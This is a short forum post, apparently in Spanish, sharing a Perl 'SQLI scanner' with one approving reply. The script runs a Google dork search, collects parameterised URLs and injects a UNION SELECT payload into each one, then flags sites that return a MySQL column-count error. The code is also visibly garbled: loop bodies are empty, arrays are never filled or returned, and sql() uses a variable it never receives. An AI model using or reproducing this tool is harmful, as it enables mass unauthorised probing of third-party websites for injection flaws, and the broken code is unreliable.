Un simple scanner de SQLI para usar en google
#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011
use LWP::UserAgent;
use HTML::LinkExtor;
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n"; copyright();
<stdin>;
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
}
}
}
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
}
}
my @founds = repes(@founds);
}
sub sql {
my ($pass1,$pass2) = ("+","--");
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n"; }}
sub get_links {
$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
sub agarrar {
my ($a,%b) = @_;
}
}
sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++; }
}
sub head {
print "\n\n-- == Search Google == --\n\n"; }
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n"; }
sub toma {
return $nave->get($_[0])->content; }
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content; }
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
Nada como los script ... pulento aporte